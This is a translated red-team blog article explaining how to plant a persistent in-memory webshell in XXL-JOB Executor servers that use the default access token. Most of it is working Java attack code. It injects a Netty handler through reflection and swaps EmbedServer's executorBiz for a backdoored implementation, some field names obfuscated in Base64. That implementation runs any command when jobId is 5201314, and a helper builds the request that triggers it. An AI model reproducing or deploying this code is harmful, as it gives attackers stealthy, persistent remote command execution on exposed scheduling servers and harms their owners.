Disclaimer:
This public account is dedicated to security research and red-team attack/defense techniques. Nothing in this article targets any vendor or individual. Any direct or indirect consequences or losses caused by spreading or exploiting the techniques and tools published by this account are borne solely by the user. Please comply with the relevant laws and regulations of the People's Republic of China, and do not use the techniques or tools published here for illegal activities. Finally, if any text or image in this article inadvertently infringes on someone's rights, please contact the author via private message in the public account backend to have it removed.
XXL-JOB is a distributed task scheduling platform, split into an Admin (scheduling center) and an Executor. Since version 2.2.0 the Executor has exposed a RESTful API, listening on port 9999 by default. Historically, the Executor has suffered from unauthenticated access and a default accessToken, allowing attackers to invoke Executor tasks without any authentication. (Strictly speaking this is not a code-level security flaw; the developers presumably assumed that a distributed task scheduling component would only ever run inside a trusted internal network, so no authentication hardening was built into the code.) In v2.3.1, released on May 21, 2022, the author enabled accessToken for scheduler communication and recommended customizing it in production. In practice, however, most applications ship with the default configuration, and the vast majority of XXL-JOB instances deployed on public clouds have no inbound firewall rules, exposing the Executor directly to the Internet and greatly enlarging the attack surface.

Because the product is itself a task scheduling platform, it supports script tasks in multiple languages (Shell, Python, Java, PHP, NodeJS, PowerShell), provided the Executor host has the corresponding runtimes installed. Most public exploits use a Shell script task to spawn a reverse shell or pull down a C2 implant, which requires the compromised server to have outbound connectivity and therefore raises the cost of exploitation during perimeter breaches. The Executor's RESTful API is implemented on the Netty framework, and almost all published Netty memory-shell techniques target the Spring Cloud Gateway SpEL code-execution scenario, which does not transfer to XXL-JOB. This article therefore adapts a Netty memory shell to the XXL-JOB Executor exploitation scenario to solve that problem.
During Netty startup, ChannelInitializer#initChannel is responsible for adding the user-configured handlers to the ServerSocketChannel's pipeline. Looking at EmbedServer#start, the Executor's initChannel adds the following handlers to the pipeline to process business requests; the EmbedServer$EmbedHttpServerHandler class is the one that handles the Executor's externally exposed RESTful API requests.
channel.pipeline()
        .addLast(new IdleStateHandler(0L, 0L, 90L, TimeUnit.SECONDS))
        .addLast(new HttpServerCodec())
        .addLast(new HttpObjectAggregator(5242880))
        .addLast(new EmbedServer.EmbedHttpServerHandler(executorBiz, accessToken, bizThreadPool));
EmbedServer$EmbedHttpServerHandler extends SimpleChannelInboundHandler and overrides channelRead0 to authenticate and dispatch requests: it checks whether the XXL-JOB-ACCESS-TOKEN request header matches the value in the configuration file, then routes the URI to the corresponding method call.
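The token check in channelRead0 boils down to a plain string comparison. The sketch below illustrates that logic with stdlib Java only; the class and method names here are illustrative, not the actual EmbedHttpServerHandler code:

```java
// Illustrative sketch of the accessToken gate in EmbedHttpServerHandler#channelRead0.
// TokenGate and isValid are hypothetical names; only the comparison logic is mirrored.
public class TokenGate {
    private final String configuredToken; // value of xxl.job.accessToken

    public TokenGate(String configuredToken) {
        this.configuredToken = configuredToken;
    }

    // requestToken comes from the XXL-JOB-ACCESS-TOKEN request header
    public boolean isValid(String requestToken) {
        // no token configured -> every caller is accepted (the historical unauth issue)
        if (configuredToken == null || configuredToken.trim().isEmpty()) {
            return true;
        }
        return configuredToken.equals(requestToken);
    }

    public static void main(String[] args) {
        TokenGate open = new TokenGate("");           // default deployment
        TokenGate locked = new TokenGate("secret");   // hardened deployment
        System.out.println(open.isValid(null));       // true: unauthenticated access
        System.out.println(locked.isValid("secret")); // true
        System.out.println(locked.isValid("wrong"));  // false
    }
}
```

This is why a default-configured Executor (empty token) accepts any caller on port 9999.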
In Netty, handlers can be added dynamically through the pipeline object (DefaultChannelPipeline) via addFirst, addBefore, and addLast, which respectively insert a handler at the head of the doubly-linked list, immediately before a named handler, and at the tail of the list.
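The resulting handler ordering can be illustrated with a plain list (an analogy only; the real DefaultChannelPipeline links AbstractChannelHandlerContext nodes, and addBefore takes the existing handler's name):

```java
import java.util.LinkedList;

// Analogy for DefaultChannelPipeline ordering: handlers as nodes in a doubly-linked list.
public class PipelineOrderDemo {
    public static void main(String[] args) {
        LinkedList<String> pipeline = new LinkedList<>();
        pipeline.addLast("HttpServerCodec");        // appended at the tail
        pipeline.addLast("HttpObjectAggregator");
        pipeline.addLast("EmbedHttpServerHandler");
        pipeline.addFirst("IdleStateHandler");      // inserted at the head

        // addBefore("EmbedHttpServerHandler", ...) ~= insert at that handler's index,
        // so the injected handler sees the request first
        int idx = pipeline.indexOf("EmbedHttpServerHandler");
        pipeline.add(idx, "MyHttpServerHandler");

        System.out.println(pipeline);
    }
}
```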
A memory shell can therefore obtain the DefaultChannelPipeline via reflection and use addBefore to insert a handler ahead of EmbedServer$EmbedHttpServerHandler, one that first checks whether the incoming request is a webshell request and, if so, executes it. The implementation looks roughly like this:
try {
    // Enumerate all live threads via the private static Thread.getThreads()
    Method getThreads = Thread.class.getDeclaredMethod("getThreads");
    getThreads.setAccessible(true);
    Object threads = getThreads.invoke(null);
    for (int i = 0; i < Array.getLength(threads); i++) {
        Object thread = Array.get(threads, i);
        if (thread != null && thread.getClass().getName().contains("FastThreadLocalThread")) {
            // Netty event-loop thread -> blocker (inner class of SelectorImpl) -> outer SelectorImpl
            Field _blocker = thread.getClass().getSuperclass().getDeclaredField("blocker");
            _blocker.setAccessible(true);
            Object blocker = _blocker.get(thread);
            Field _this_0 = blocker.getClass().getDeclaredField("this$0");
            _this_0.setAccessible(true);
            Object this_0 = _this_0.get(blocker);
            // SelectorImpl#fdToKey maps file descriptors to SelectionKeyImpl objects
            Field _fdToKey = this_0.getClass().getDeclaredField("fdToKey");
            _fdToKey.setAccessible(true);
            Object fdToKey = _fdToKey.get(this_0);
            Method values = fdToKey.getClass().getDeclaredMethod("values");
            values.setAccessible(true);
            Collection<SelectionKeyImpl> keys = (Collection<SelectionKeyImpl>) values.invoke(fdToKey);
            for (SelectionKeyImpl key : keys) {
                // SelectionKey#attachment holds the Netty channel registered with the selector
                Field _attachment = key.getClass().getSuperclass().getSuperclass().getDeclaredField("attachment");
                _attachment.setAccessible(true);
                Object attachment = _attachment.get(key);
                if (attachment.getClass().getName().contains("NioServerSocketChannel")) {
                    Method _pipeline = attachment.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("pipeline");
                    _pipeline.setAccessible(true);
                    DefaultChannelPipeline pipeline = (DefaultChannelPipeline) _pipeline.invoke(attachment);
                    Object handler = ReflectUtils.defineClass("MyHttpServerHandler", "bytecode...", Thread.currentThread().getContextClassLoader()).newInstance();
                    pipeline.addBefore("EmbedServer$EmbedHttpServerHandler#0", "MyHttpServerHandler#0", (ChannelHandler) handler);
                }
            }
        }
    }
} catch (Exception e) {
    e.printStackTrace();
}
Actual testing confirms that the code above does register the handler ahead of EmbedServer$EmbedHttpServerHandler, letting it inspect a request-header attribute to decide whether the request is a command-execution attempt and return the result.
The problem is that Netty builds a fresh set of handlers and adds them to the pipeline for every client connection (Channel), which means the injected memory-shell handler only exists for the current request; every new request re-registers the handlers. The call stack is as follows:
Injecting the memory shell via a Java agent would be much more convenient, for example dynamically patching the bytecode of the handlers the application adds at startup, so that channelRead checks for command execution before the normal business logic runs. But that approach requires dropping a file to disk, which raises the cost of the attack and easily leaves traces.
In fact, the Executor's exposed endpoints all delegate to methods of a single ExecutorBizImpl object that remains unchanged for the entire lifetime of the application. We can therefore use reflection to replace it with a class that adds webshell functionality: the original method bodies are kept intact, and a check for memory-shell invocations is added in front of them. For example, the code below modifies ExecutorBizImpl#run so that if the job ID is 5201314, the glueSource parameter is executed as a command and its output is returned. The Executor can of course already execute commands and read results via the /run and /log endpoints; this step merely validates the approach and lays the groundwork for injecting an encrypted Behinder/Godzilla-style webshell.
import com.xxl.job.core.biz.ExecutorBiz;
import com.xxl.job.core.biz.model.IdleBeatParam;
import com.xxl.job.core.biz.model.KillParam;
import com.xxl.job.core.biz.model.LogParam;
import com.xxl.job.core.biz.model.LogResult;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.biz.model.TriggerParam;
import com.xxl.job.core.enums.ExecutorBlockStrategyEnum;
import com.xxl.job.core.executor.XxlJobExecutor;
import com.xxl.job.core.glue.GlueFactory;
import com.xxl.job.core.glue.GlueTypeEnum;
import com.xxl.job.core.handler.IJobHandler;
import com.xxl.job.core.handler.impl.GlueJobHandler;
import com.xxl.job.core.handler.impl.ScriptJobHandler;
import com.xxl.job.core.log.XxlJobFileAppender;
import com.xxl.job.core.thread.JobThread;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Date;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class CommandExecutorBizImpl implements ExecutorBiz {
    private static Logger logger = LoggerFactory.getLogger(com.xxl.job.core.biz.impl.ExecutorBizImpl.class);

    public CommandExecutorBizImpl() {
    }

    public ReturnT<String> beat() {
        return ReturnT.SUCCESS;
    }

    public ReturnT<String> idleBeat(IdleBeatParam idleBeatParam) {
        boolean isRunningOrHasQueue = false;
        JobThread jobThread = XxlJobExecutor.loadJobThread(idleBeatParam.getJobId());
        if (jobThread != null && jobThread.isRunningOrHasQueue()) {
            isRunningOrHasQueue = true;
        }
        return isRunningOrHasQueue ? new ReturnT(500, "job thread is running or has trigger queue.") : ReturnT.SUCCESS;
    }

    public ReturnT<String> run(TriggerParam triggerParam) {
        // Memory-shell hook: job ID 5201314 executes glueSource as a system command
        try {
            if (triggerParam.getJobId() == 5201314) {
                String command = triggerParam.getGlueSource();
                ProcessBuilder processBuilder = new ProcessBuilder(command.split("\\s+"));
                Process process = processBuilder.start();
                InputStream inputStream = process.getInputStream();
                BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
                StringBuilder output = new StringBuilder();
                String line;
                while ((line = reader.readLine()) != null) {
                    output.append(line).append("\n");
                }
                return new ReturnT<>(output.toString());
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        // Everything below is the original ExecutorBizImpl#run logic, unchanged
        JobThread jobThread = XxlJobExecutor.loadJobThread(triggerParam.getJobId());
        IJobHandler jobHandler = jobThread != null ? jobThread.getHandler() : null;
        String removeOldReason = null;
        GlueTypeEnum glueTypeEnum = GlueTypeEnum.match(triggerParam.getGlueType());
        IJobHandler originJobHandler;
        if (GlueTypeEnum.BEAN == glueTypeEnum) {
            originJobHandler = XxlJobExecutor.loadJobHandler(triggerParam.getExecutorHandler());
            if (jobThread != null && jobHandler != originJobHandler) {
                removeOldReason = "change jobhandler or glue type, and terminate the old job thread.";
                jobThread = null;
                jobHandler = null;
            }
            if (jobHandler == null) {
                jobHandler = originJobHandler;
                if (originJobHandler == null) {
                    return new ReturnT(500, "job handler [" + triggerParam.getExecutorHandler() + "] not found.");
                }
            }
        } else if (GlueTypeEnum.GLUE_GROOVY == glueTypeEnum) {
            if (jobThread != null && (!(jobThread.getHandler() instanceof GlueJobHandler) || ((GlueJobHandler)jobThread.getHandler()).getGlueUpdatetime() != triggerParam.getGlueUpdatetime())) {
                removeOldReason = "change job source or glue type, and terminate the old job thread.";
                jobThread = null;
                jobHandler = null;
            }
            if (jobHandler == null) {
                try {
                    originJobHandler = GlueFactory.getInstance().loadNewInstance(triggerParam.getGlueSource());
                    jobHandler = new GlueJobHandler(originJobHandler, triggerParam.getGlueUpdatetime());
                } catch (Exception var7) {
                    logger.error(var7.getMessage(), var7);
                    return new ReturnT(500, var7.getMessage());
                }
            }
        } else {
            if (glueTypeEnum == null || !glueTypeEnum.isScript()) {
                return new ReturnT(500, "glueType[" + triggerParam.getGlueType() + "] is not valid.");
            }
            if (jobThread != null && (!(jobThread.getHandler() instanceof ScriptJobHandler) || ((ScriptJobHandler)jobThread.getHandler()).getGlueUpdatetime() != triggerParam.getGlueUpdatetime())) {
                removeOldReason = "change job source or glue type, and terminate the old job thread.";
                jobThread = null;
                jobHandler = null;
            }
            if (jobHandler == null) {
                jobHandler = new ScriptJobHandler(triggerParam.getJobId(), triggerParam.getGlueUpdatetime(), triggerParam.getGlueSource(), GlueTypeEnum.match(triggerParam.getGlueType()));
            }
        }
        if (jobThread != null) {
            ExecutorBlockStrategyEnum blockStrategy = ExecutorBlockStrategyEnum.match(triggerParam.getExecutorBlockStrategy(), (ExecutorBlockStrategyEnum)null);
            if (ExecutorBlockStrategyEnum.DISCARD_LATER == blockStrategy) {
                if (jobThread.isRunningOrHasQueue()) {
                    return new ReturnT(500, "block strategy effect:" + ExecutorBlockStrategyEnum.DISCARD_LATER.getTitle());
                }
            } else if (ExecutorBlockStrategyEnum.COVER_EARLY == blockStrategy && jobThread.isRunningOrHasQueue()) {
                removeOldReason = "block strategy effect:" + ExecutorBlockStrategyEnum.COVER_EARLY.getTitle();
                jobThread = null;
            }
        }
        if (jobThread == null) {
            jobThread = XxlJobExecutor.registJobThread(triggerParam.getJobId(), (IJobHandler)jobHandler, removeOldReason);
        }
        ReturnT<String> pushResult = jobThread.pushTriggerQueue(triggerParam);
        return pushResult;
    }

    public ReturnT<String> kill(KillParam killParam) {
        JobThread jobThread = XxlJobExecutor.loadJobThread(killParam.getJobId());
        if (jobThread != null) {
            XxlJobExecutor.removeJobThread(killParam.getJobId(), "scheduling center kill job.");
            return ReturnT.SUCCESS;
        } else {
            return new ReturnT(200, "job thread already killed.");
        }
    }

    public ReturnT<LogResult> log(LogParam logParam) {
        String logFileName = XxlJobFileAppender.makeLogFileName(new Date(logParam.getLogDateTim()), logParam.getLogId());
        LogResult logResult = XxlJobFileAppender.readLog(logFileName, logParam.getFromLineNum());
        return new ReturnT(logResult);
    }
}
The complete injection code:
package com.xxl.job.service.handler;

import com.xxl.job.core.log.XxlJobLogger;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.handler.IJobHandler;
import java.util.*;
import java.lang.reflect.*;
import com.xxl.job.core.server.*;
import org.springframework.cglib.core.*;
import sun.nio.ch.SelectionKeyImpl;
import io.netty.channel.DefaultChannelPipeline;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.ChannelHandler;
import org.springframework.cglib.core.ReflectUtils;
import com.xxl.job.core.biz.ExecutorBiz;

public class DemoGlueJobHandler extends IJobHandler {

    @Override
    public ReturnT<String> execute(String param) throws Exception {
        XxlJobLogger.log("XXL-JOB, Hello World.");
        try {
            Method getThreads = Thread.class.getDeclaredMethod("getThreads");
            getThreads.setAccessible(true);
            Object threads = getThreads.invoke(null);
            for (int i = 0; i < Array.getLength(threads); i++) {
                Object thread = Array.get(threads, i);
                try {
                    // Locate the thread whose Runnable target is the EmbedServer's inner class
                    Field _target = thread.getClass().getDeclaredField("target");
                    _target.setAccessible(true);
                    Object target = _target.get(thread);
                    if (target != null && target.getClass().getName().contains("EmbedServer")) {
                        XxlJobLogger.log(target.getClass().getName());
                        // "dGhpcyQw" decodes to "this$0": the inner class's reference to EmbedServer
                        Field _this_0 = target.getClass().getDeclaredField(new String(Base64.getDecoder().decode("dGhpcyQw")));
                        _this_0.setAccessible(true);
                        Object embedServer = _this_0.get(target);
                        XxlJobLogger.log(embedServer.getClass().getName());
                        Field _executorBiz = embedServer.getClass().getDeclaredField("executorBiz");
                        _executorBiz.setAccessible(true);
                        // Replace executorBiz with the backdoored CommandExecutorBizImpl
                        _executorBiz.set(embedServer, (ExecutorBiz) ReflectUtils.defineClass("CommandExecutorBizImpl", Base64.getDecoder().decode("bytecode"), Thread.currentThread().getContextClassLoader()).newInstance());
                        ExecutorBiz biz = (ExecutorBiz) _executorBiz.get(embedServer);
                    }
                } catch (NoSuchFieldException nsfe) {
                    continue;
                }
            }
            XxlJobLogger.log("XXL-JOB, End!");
        } catch (Exception e) {
            XxlJobLogger.log(e.getMessage());
        }
        return ReturnT.SUCCESS;
    }
}
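The reflection swap performed above can be distilled to a pattern that is easy to study outside XXL-JOB: a long-lived object held in a private field is replaced with a class that intercepts a magic value and otherwise behaves normally. The sketch below is a self-contained stdlib illustration; all names are hypothetical (the injection code targets EmbedServer#executorBiz, and the article's CommandExecutorBizImpl reimplements the original methods rather than delegating, which is an equivalent choice):

```java
import java.lang.reflect.Field;

// Minimal sketch of replacing a private field's long-lived implementation via reflection.
public class FieldSwapDemo {
    interface Biz { String run(String param); }

    static class RealBiz implements Biz {
        public String run(String param) { return "real:" + param; }
    }

    // Wrapper: intercepts a magic value, otherwise delegates to the original behavior.
    static class BackdooredBiz implements Biz {
        private final Biz origin;
        BackdooredBiz(Biz origin) { this.origin = origin; }
        public String run(String param) {
            if ("5201314".equals(param)) {
                return "intercepted"; // here the real payload would execute a command
            }
            return origin.run(param);
        }
    }

    static class Server {
        private Biz biz = new RealBiz(); // analogous to EmbedServer#executorBiz
        String handle(String param) { return biz.run(param); }
    }

    public static void main(String[] args) throws Exception {
        Server server = new Server();
        Field f = Server.class.getDeclaredField("biz");
        f.setAccessible(true);
        f.set(server, new BackdooredBiz((Biz) f.get(server)));

        System.out.println(server.handle("job"));     // real:job
        System.out.println(server.handle("5201314")); // intercepted
    }
}
```

Because only the field's value changes, normal traffic still gets the original behavior, which is what makes this style of memory shell survive across requests.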
The result in action:
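Once the backdoored ExecutorBiz is installed, it is triggered through the Executor's normal /run endpoint (port 9999, XXL-JOB-ACCESS-TOKEN header required if a token is configured) with jobId 5201314 and the command in glueSource. The helper below builds such a request body; the field names follow com.xxl.job.core.biz.model.TriggerParam, but the exact JSON framing here is an illustrative assumption, not captured traffic:

```java
// Builds the JSON body a caller would POST to http://<executor>:9999/run.
// Field names follow TriggerParam; values other than jobId/glueSource are filler.
public class TriggerPayload {
    static String buildRunBody(int jobId, String command) {
        long now = System.currentTimeMillis();
        return "{"
                + "\"jobId\":" + jobId + ","
                + "\"executorHandler\":\"\","
                + "\"glueType\":\"GLUE_SHELL\","
                + "\"glueSource\":\"" + command + "\","
                + "\"glueUpdatetime\":" + now + ","
                + "\"logId\":1,"
                + "\"logDateTime\":" + now
                + "}";
    }

    public static void main(String[] args) {
        // jobId 5201314 hits the memory-shell branch; glueSource carries the command
        System.out.println(buildRunBody(5201314, "id"));
    }
}
```

Note that in the backdoored run() the jobId check fires before any glueType handling, so the glueType value is irrelevant for the memory-shell path.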
Originally published on the WeChat public account 哈拉少安全小队: "XXL-JOB内存马" (XXL-JOB Memory Shell).